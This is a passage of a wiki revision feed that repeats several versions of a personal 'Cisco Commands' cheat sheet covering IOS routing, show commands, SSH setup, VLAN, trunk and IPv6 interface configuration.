=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1041</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1041"/>
		<updated>2026-01-14T21:36:21Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Configure SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;hr&amp;gt;&lt;br /&gt;
====Commands for cisco IOS devices (switches, routers, etc)====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Enable ipv4 routing====&lt;br /&gt;
This needs to be manually done sometimes on layer 3 switches&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
====Enable ipv6 routing====&lt;br /&gt;
This needs to be done on routers to enable ipv6 functionality&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Show the entire mac address table (Lets you figure out what device is plugged into each switch port)&lt;br /&gt;
 show mac address-table&lt;br /&gt;
&lt;br /&gt;
Show OS and Device versions&lt;br /&gt;
 show version&lt;br /&gt;
&lt;br /&gt;
Show logged in users&lt;br /&gt;
 show users&lt;br /&gt;
&lt;br /&gt;
List files in current directory&lt;br /&gt;
 dir&lt;br /&gt;
&lt;br /&gt;
List files in nvram&lt;br /&gt;
 dir nvram:&lt;br /&gt;
&lt;br /&gt;
Copy command destinatons (we use running-config as an example source file)&lt;br /&gt;
 copy running-config [[cisco copy destinations]]&lt;br /&gt;
&lt;br /&gt;
Elevate to root user&lt;br /&gt;
 enable&lt;br /&gt;
&lt;br /&gt;
Add an encrypted password for the enable command&lt;br /&gt;
 enable secret ThisisaSecret&lt;br /&gt;
&lt;br /&gt;
Enter global configuration mode (You can use the &amp;lt;code&amp;gt;do&amp;lt;/code&amp;gt; prefix to run regular commands from the config mode if you don&#039;t feel like running &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; first)&lt;br /&gt;
 configure terminal&lt;br /&gt;
&lt;br /&gt;
Show startup config (the one stored in nvram for next boot)&lt;br /&gt;
 show startup-config&lt;br /&gt;
&lt;br /&gt;
Show running config (the one stored in ram and is currently in use)&lt;br /&gt;
 show running-config&lt;br /&gt;
&lt;br /&gt;
Show a specific interface&#039;s config in the running configuration. &lt;br /&gt;
 show run interface g0/0&lt;br /&gt;
&lt;br /&gt;
Filter through the running config (similar to grep on linux)&lt;br /&gt;
 show run | include {searchterm}&lt;br /&gt;
 show run | begin {searchterm}&lt;br /&gt;
 show run | section {section-name}&lt;br /&gt;
&lt;br /&gt;
Copy the in-use config to the startup config so that it will be used on the next boot. There are two ways to shorten it below&lt;br /&gt;
 copy running-config startup-config&lt;br /&gt;
 copy run start&lt;br /&gt;
 wr&lt;br /&gt;
&lt;br /&gt;
Apply weak encryption to all unencrypted passwords. This only changes what is displayed in the config file, any password typed through a network cable is still transmitted in plain text.&lt;br /&gt;
 service password-encryption&lt;br /&gt;
&lt;br /&gt;
Show IPv4 IP Address assigned to each interface&lt;br /&gt;
 show ip interface brief &lt;br /&gt;
&lt;br /&gt;
Show IPv6 IP Address assigned to each interface&lt;br /&gt;
 show ipv6 interface brief &lt;br /&gt;
&lt;br /&gt;
Show all routes&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
Show vlans and interfaces assigned to them&lt;br /&gt;
 show vlan brief&lt;br /&gt;
&lt;br /&gt;
Show VLAN and related information about an interface&lt;br /&gt;
 show interface g0/1 switchport&lt;br /&gt;
&lt;br /&gt;
Show trunk interfaces&lt;br /&gt;
 show int trunk&lt;br /&gt;
&lt;br /&gt;
Clear mac address table (switches only)&lt;br /&gt;
 clear mac address-table&lt;br /&gt;
&lt;br /&gt;
Clear arp cache&lt;br /&gt;
 clear arp-cache&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Telnet/Remote Access Commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Remote into a connected device using telnet&lt;br /&gt;
 connect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Show a list of hosts to connect to&lt;br /&gt;
 show hosts&lt;br /&gt;
&lt;br /&gt;
Show all connected telnet sessions&lt;br /&gt;
 show sessions&lt;br /&gt;
&lt;br /&gt;
Disconnect a telnet session&lt;br /&gt;
 disconnect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Suspend the active telnet connection (Keyboard Shortcut)&lt;br /&gt;
 Ctrl+Shift+6 -&amp;gt; x&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Configure SSH====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the domain name&lt;br /&gt;
 ip domain-name cisco.com&lt;br /&gt;
&lt;br /&gt;
Generate rsa keypair&lt;br /&gt;
 crypto key generate rsa&lt;br /&gt;
&lt;br /&gt;
Delete rsa keypair&lt;br /&gt;
  crypto key zeroize rsa&lt;br /&gt;
&lt;br /&gt;
Make a user account&lt;br /&gt;
 username admin secret ccna&lt;br /&gt;
&lt;br /&gt;
Assign a default gateway&lt;br /&gt;
 ip default-gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
Enable ssh on the VTY lines (the second command disables telnet and forces ssh)&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Enable SSH v2&lt;br /&gt;
 ip ssh version 2&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Global configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Disable default behavior of looking up unknown names/commands in DNS&lt;br /&gt;
 no ip domain-lookup&lt;br /&gt;
&lt;br /&gt;
Set a banner message&lt;br /&gt;
 banner motd MESSAGEHERE&lt;br /&gt;
&lt;br /&gt;
Change the machine&#039;s hostname (does not require a reboot)&lt;br /&gt;
 hostname&lt;br /&gt;
&lt;br /&gt;
Configure the console port (0)&lt;br /&gt;
 line con 0&lt;br /&gt;
&lt;br /&gt;
Configure vty interfaces 0 through 15&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;vlan 1&amp;quot;&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;fa0/1&amp;quot;&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
&lt;br /&gt;
Configure the range of interfaces fa0/2 to fa0/3&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
&lt;br /&gt;
Enter vlan configuration mode&lt;br /&gt;
 vlan 1&lt;br /&gt;
&lt;br /&gt;
====Vlan Configuration Commands====&lt;br /&gt;
Set vlan name&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&lt;br /&gt;
====Console or VTY line configuration commands====&lt;br /&gt;
Add a password to console port access&lt;br /&gt;
 password itsasecret&lt;br /&gt;
&lt;br /&gt;
Force users to enter the password to login&lt;br /&gt;
 login&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Interface configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the interface to a specific vlan (Alt)&lt;br /&gt;
 encapsulation dot1q 10&lt;br /&gt;
&lt;br /&gt;
Set the interface to a specific vlan&lt;br /&gt;
 switchport mode access ! disable trunking, default is switchport mode auto&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
Set an interface to trunk mode&lt;br /&gt;
 switchport trunk encapsulation dot1q ! switches off the legacy cisco trunking protocol, not needed on newer switches&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
Change allowed vlans on trunk interface&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
Set native vlan on a trunk interface&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
Set an IPv4 address on the interface&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Change interface state to &amp;quot;up&amp;quot;&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Ipv6 Interface Commands=====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set an IPv6 address on the interface&lt;br /&gt;
 ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Set a link-local address on the interface&lt;br /&gt;
  ipv6 addr fe80::1 link-local&lt;br /&gt;
&lt;br /&gt;
Remove an IPv6 address on the interface&lt;br /&gt;
 no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Remove all IPv6 addresses on the interface&lt;br /&gt;
 no ipv6 address&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1040</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1040"/>
		<updated>2026-01-14T21:27:54Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Configure SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;hr&amp;gt;&lt;br /&gt;
====Commands for cisco IOS devices (switches, routers, etc)====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Enable ipv4 routing====&lt;br /&gt;
This needs to be manually done sometimes on layer 3 switches&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
====Enable ipv6 routing====&lt;br /&gt;
This needs to be done on routers to enable ipv6 functionality&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Show the entire mac address table (Lets you figure out what device is plugged into each switch port)&lt;br /&gt;
 show mac address-table&lt;br /&gt;
&lt;br /&gt;
Show OS and Device versions&lt;br /&gt;
 show version&lt;br /&gt;
&lt;br /&gt;
Show logged in users&lt;br /&gt;
 show users&lt;br /&gt;
&lt;br /&gt;
List files in current directory&lt;br /&gt;
 dir&lt;br /&gt;
&lt;br /&gt;
List files in nvram&lt;br /&gt;
 dir nvram:&lt;br /&gt;
&lt;br /&gt;
Copy command destinatons (we use running-config as an example source file)&lt;br /&gt;
 copy running-config [[cisco copy destinations]]&lt;br /&gt;
&lt;br /&gt;
Elevate to root user&lt;br /&gt;
 enable&lt;br /&gt;
&lt;br /&gt;
Add an encrypted password for the enable command&lt;br /&gt;
 enable secret ThisisaSecret&lt;br /&gt;
&lt;br /&gt;
Enter global configuration mode (You can use the &amp;lt;code&amp;gt;do&amp;lt;/code&amp;gt; prefix to run regular commands from the config mode if you don&#039;t feel like running &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; first)&lt;br /&gt;
 configure terminal&lt;br /&gt;
&lt;br /&gt;
Show startup config (the one stored in nvram for next boot)&lt;br /&gt;
 show startup-config&lt;br /&gt;
&lt;br /&gt;
Show running config (the one stored in ram and is currently in use)&lt;br /&gt;
 show running-config&lt;br /&gt;
&lt;br /&gt;
Show a specific interface&#039;s config in the running configuration. &lt;br /&gt;
 show run interface g0/0&lt;br /&gt;
&lt;br /&gt;
Filter through the running config (similar to grep on linux)&lt;br /&gt;
 show run | include {searchterm}&lt;br /&gt;
 show run | begin {searchterm}&lt;br /&gt;
 show run | section {section-name}&lt;br /&gt;
&lt;br /&gt;
Copy the in-use config to the startup config so that it will be used on the next boot. There are two ways to shorten it below&lt;br /&gt;
 copy running-config startup-config&lt;br /&gt;
 copy run start&lt;br /&gt;
 wr&lt;br /&gt;
&lt;br /&gt;
Apply weak encryption to all unencrypted passwords. This only changes what is displayed in the config file, any password typed through a network cable is still transmitted in plain text.&lt;br /&gt;
 service password-encryption&lt;br /&gt;
&lt;br /&gt;
Show IPv4 IP Address assigned to each interface&lt;br /&gt;
 show ip interface brief &lt;br /&gt;
&lt;br /&gt;
Show IPv6 IP Address assigned to each interface&lt;br /&gt;
 show ipv6 interface brief &lt;br /&gt;
&lt;br /&gt;
Show all routes&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
Show vlans and interfaces assigned to them&lt;br /&gt;
 show vlan brief&lt;br /&gt;
&lt;br /&gt;
Show VLAN and related information about an interface&lt;br /&gt;
 show interface g0/1 switchport&lt;br /&gt;
&lt;br /&gt;
Show trunk interfaces&lt;br /&gt;
 show int trunk&lt;br /&gt;
&lt;br /&gt;
Clear mac address table (switches only)&lt;br /&gt;
 clear mac address-table&lt;br /&gt;
&lt;br /&gt;
Clear arp cache&lt;br /&gt;
 clear arp-cache&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Telnet/Remote Access Commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Remote into a connected device using telnet&lt;br /&gt;
 connect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Show a list of hosts to connect to&lt;br /&gt;
 show hosts&lt;br /&gt;
&lt;br /&gt;
Show all connected telnet sessions&lt;br /&gt;
 show sessions&lt;br /&gt;
&lt;br /&gt;
Disconnect a telnet session&lt;br /&gt;
 disconnect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Suspend the active telnet connection (Keyboard Shortcut)&lt;br /&gt;
 Ctrl+Shift+6 -&amp;gt; x&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Configure SSH====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the domain name&lt;br /&gt;
 ip domain-name cisco.com&lt;br /&gt;
&lt;br /&gt;
Generate rsa keypair&lt;br /&gt;
 crypto key generate rsa&lt;br /&gt;
&lt;br /&gt;
Delete rsa keypair&lt;br /&gt;
  crypto key zeroize rsa&lt;br /&gt;
&lt;br /&gt;
Make a user account&lt;br /&gt;
 username admin secret ccna&lt;br /&gt;
&lt;br /&gt;
Assign a default gateway&lt;br /&gt;
 ip default-gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
Enable ssh on the VTY lines&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Enable SSH v2&lt;br /&gt;
 ip ssh version 2&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Global configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Disable default behavior of looking up unknown names/commands in DNS&lt;br /&gt;
 no ip domain-lookup&lt;br /&gt;
&lt;br /&gt;
Set a banner message&lt;br /&gt;
 banner motd MESSAGEHERE&lt;br /&gt;
&lt;br /&gt;
Change the machine&#039;s hostname (does not require a reboot)&lt;br /&gt;
 hostname&lt;br /&gt;
&lt;br /&gt;
Configure the console port (0)&lt;br /&gt;
 line con 0&lt;br /&gt;
&lt;br /&gt;
Configure vty interfaces 0 through 15&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;vlan 1&amp;quot;&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;fa0/1&amp;quot;&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
&lt;br /&gt;
Configure the range of interfaces fa0/2 to fa0/3&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
&lt;br /&gt;
Enter vlan configuration mode&lt;br /&gt;
 vlan 1&lt;br /&gt;
&lt;br /&gt;
====Vlan Configuration Commands====&lt;br /&gt;
Set vlan name&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&lt;br /&gt;
====Console or VTY line configuration commands====&lt;br /&gt;
Add a password to console port access&lt;br /&gt;
 password itsasecret&lt;br /&gt;
&lt;br /&gt;
Force users to enter the password to login&lt;br /&gt;
 login&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Interface configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the interface to a specific vlan (Alt)&lt;br /&gt;
 encapsulation dot1q 10&lt;br /&gt;
&lt;br /&gt;
Set the interface to a specific vlan&lt;br /&gt;
 switchport mode access ! disable trunking, default is switchport mode auto&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
Set an interface to trunk mode&lt;br /&gt;
 switchport trunk encapsulation dot1q ! switches off the legacy cisco trunking protocol, not needed on newer switches&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
Change allowed vlans on trunk interface&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
Set native vlan on a trunk interface&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
Set an IPv4 address on the interface&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Change interface state to &amp;quot;up&amp;quot;&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Ipv6 Interface Commands=====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set an IPv6 address on the interface&lt;br /&gt;
 ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Set a link-local address on the interface&lt;br /&gt;
  ipv6 addr fe80::1 link-local&lt;br /&gt;
&lt;br /&gt;
Remove an IPv6 address on the interface&lt;br /&gt;
 no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Remove all IPv6 addresses on the interface&lt;br /&gt;
 no ipv6 address&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1039</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1039"/>
		<updated>2026-01-14T21:27:28Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;hr&amp;gt;&lt;br /&gt;
====Commands for cisco IOS devices (switches, routers, etc)====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Enable ipv4 routing====&lt;br /&gt;
This needs to be manually done sometimes on layer 3 switches&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
====Enable ipv6 routing====&lt;br /&gt;
This needs to be done on routers to enable ipv6 functionality&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Show the entire mac address table (Lets you figure out what device is plugged into each switch port)&lt;br /&gt;
 show mac address-table&lt;br /&gt;
&lt;br /&gt;
Show OS and Device versions&lt;br /&gt;
 show version&lt;br /&gt;
&lt;br /&gt;
Show logged in users&lt;br /&gt;
 show users&lt;br /&gt;
&lt;br /&gt;
List files in current directory&lt;br /&gt;
 dir&lt;br /&gt;
&lt;br /&gt;
List files in nvram&lt;br /&gt;
 dir nvram:&lt;br /&gt;
&lt;br /&gt;
Copy command destinatons (we use running-config as an example source file)&lt;br /&gt;
 copy running-config [[cisco copy destinations]]&lt;br /&gt;
&lt;br /&gt;
Elevate to root user&lt;br /&gt;
 enable&lt;br /&gt;
&lt;br /&gt;
Add an encrypted password for the enable command&lt;br /&gt;
 enable secret ThisisaSecret&lt;br /&gt;
&lt;br /&gt;
Enter global configuration mode (You can use the &amp;lt;code&amp;gt;do&amp;lt;/code&amp;gt; prefix to run regular commands from the config mode if you don&#039;t feel like running &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; first)&lt;br /&gt;
 configure terminal&lt;br /&gt;
&lt;br /&gt;
Show startup config (the one stored in nvram for next boot)&lt;br /&gt;
 show startup-config&lt;br /&gt;
&lt;br /&gt;
Show running config (the one stored in ram and is currently in use)&lt;br /&gt;
 show running-config&lt;br /&gt;
&lt;br /&gt;
Show a specific interface&#039;s config in the running configuration. &lt;br /&gt;
 show run interface g0/0&lt;br /&gt;
&lt;br /&gt;
Filter through the running config (similar to grep on linux)&lt;br /&gt;
 show run | include {searchterm}&lt;br /&gt;
 show run | begin {searchterm}&lt;br /&gt;
 show run | section {section-name}&lt;br /&gt;
&lt;br /&gt;
Copy the in-use config to the startup config so that it will be used on the next boot. There are two ways to shorten it below&lt;br /&gt;
 copy running-config startup-config&lt;br /&gt;
 copy run start&lt;br /&gt;
 wr&lt;br /&gt;
&lt;br /&gt;
Apply weak encryption to all unencrypted passwords. This only changes what is displayed in the config file, any password typed through a network cable is still transmitted in plain text.&lt;br /&gt;
 service password-encryption&lt;br /&gt;
&lt;br /&gt;
Show IPv4 IP Address assigned to each interface&lt;br /&gt;
 show ip interface brief &lt;br /&gt;
&lt;br /&gt;
Show IPv6 IP Address assigned to each interface&lt;br /&gt;
 show ipv6 interface brief &lt;br /&gt;
&lt;br /&gt;
Show all routes&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
Show vlans and interfaces assigned to them&lt;br /&gt;
 show vlan brief&lt;br /&gt;
&lt;br /&gt;
Show VLAN and related information about an interface&lt;br /&gt;
 show interface g0/1 switchport&lt;br /&gt;
&lt;br /&gt;
Show trunk interfaces&lt;br /&gt;
 show int trunk&lt;br /&gt;
&lt;br /&gt;
Clear mac address table (switches only)&lt;br /&gt;
 clear mac address-table&lt;br /&gt;
&lt;br /&gt;
Clear arp cache&lt;br /&gt;
 clear arp-cache&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Telnet/Remote Access Commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Remote into a connected device using telnet&lt;br /&gt;
 connect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Show a list of hosts to connect to&lt;br /&gt;
 show hosts&lt;br /&gt;
&lt;br /&gt;
Show all connected telnet sessions&lt;br /&gt;
 show sessions&lt;br /&gt;
&lt;br /&gt;
Disconnect a telnet session&lt;br /&gt;
 disconnect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Suspend the active telnet connection (Keyboard Shortcut)&lt;br /&gt;
 Ctrl+Shift+6 -&amp;gt; x&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Configure SSH====&lt;br /&gt;
Set the domain name&lt;br /&gt;
 ip domain-name cisco.com&lt;br /&gt;
&lt;br /&gt;
Generate rsa keypair&lt;br /&gt;
 crypto key generate rsa&lt;br /&gt;
&lt;br /&gt;
Delete rsa keypair&lt;br /&gt;
  crypto key zeroize rsa&lt;br /&gt;
&lt;br /&gt;
Make a user account&lt;br /&gt;
 username admin secret ccna&lt;br /&gt;
&lt;br /&gt;
Assign a default gateway&lt;br /&gt;
 ip default-gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
Enable ssh on the VTY lines&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Enable SSH v2&lt;br /&gt;
 ip ssh version 2&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Global configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Disable default behavior of looking up unknown names/commands in DNS&lt;br /&gt;
 no ip domain-lookup&lt;br /&gt;
&lt;br /&gt;
Set a banner message&lt;br /&gt;
 banner motd MESSAGEHERE&lt;br /&gt;
&lt;br /&gt;
Change the machine&#039;s hostname (does not require a reboot)&lt;br /&gt;
 hostname&lt;br /&gt;
&lt;br /&gt;
Configure the console port (0)&lt;br /&gt;
 line con 0&lt;br /&gt;
&lt;br /&gt;
Configure vty interfaces 0 through 15&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;vlan 1&amp;quot;&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;fa0/1&amp;quot;&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
&lt;br /&gt;
Configure the range of interfaces fa0/2 to fa0/3&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
&lt;br /&gt;
Enter vlan configuration mode&lt;br /&gt;
 vlan 1&lt;br /&gt;
&lt;br /&gt;
====Vlan Configuration Commands====&lt;br /&gt;
Set vlan name&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&lt;br /&gt;
====Console or VTY line configuration commands====&lt;br /&gt;
Add a password to console port access&lt;br /&gt;
 password itsasecret&lt;br /&gt;
&lt;br /&gt;
Force users to enter the password to login&lt;br /&gt;
 login&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Interface configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the interface to a specific vlan (Alt)&lt;br /&gt;
 encapsulation dot1q 10&lt;br /&gt;
&lt;br /&gt;
Set the interface to a specific vlan&lt;br /&gt;
 switchport mode access ! disable trunking, default is switchport mode auto&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
Set an interface to trunk mode&lt;br /&gt;
 switchport trunk encapsulation dot1q ! switches off the legacy cisco trunking protocol, not needed on newer switches&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
Change allowed vlans on trunk interface&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
Set native vlan on a trunk interface&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
Set an IPv4 address on the interface&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Change interface state to &amp;quot;up&amp;quot;&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Ipv6 Interface Commands=====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set an IPv6 address on the interface&lt;br /&gt;
 ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Set a link-local address on the interface&lt;br /&gt;
  ipv6 addr fe80::1 link-local&lt;br /&gt;
&lt;br /&gt;
Remove an IPv6 address on the interface&lt;br /&gt;
 no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Remove all IPv6 addresses on the interface&lt;br /&gt;
 no ipv6 address&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1038</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1038"/>
		<updated>2026-01-14T21:27:06Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Configure SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;hr&amp;gt;&lt;br /&gt;
====Commands for cisco IOS devices (switches, routers, etc)====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Enable ipv4 routing====&lt;br /&gt;
This needs to be manually done sometimes on layer 3 switches&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
====Enable ipv6 routing====&lt;br /&gt;
This needs to be done on routers to enable ipv6 functionality&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Show the entire mac address table (Lets you figure out what device is plugged into each switch port)&lt;br /&gt;
 show mac address-table&lt;br /&gt;
&lt;br /&gt;
Show OS and Device versions&lt;br /&gt;
 show version&lt;br /&gt;
&lt;br /&gt;
Show logged in users&lt;br /&gt;
 show users&lt;br /&gt;
&lt;br /&gt;
List files in current directory&lt;br /&gt;
 dir&lt;br /&gt;
&lt;br /&gt;
List files in nvram&lt;br /&gt;
 dir nvram:&lt;br /&gt;
&lt;br /&gt;
Copy command destinatons (we use running-config as an example source file)&lt;br /&gt;
 copy running-config [[cisco copy destinations]]&lt;br /&gt;
&lt;br /&gt;
Elevate to root user&lt;br /&gt;
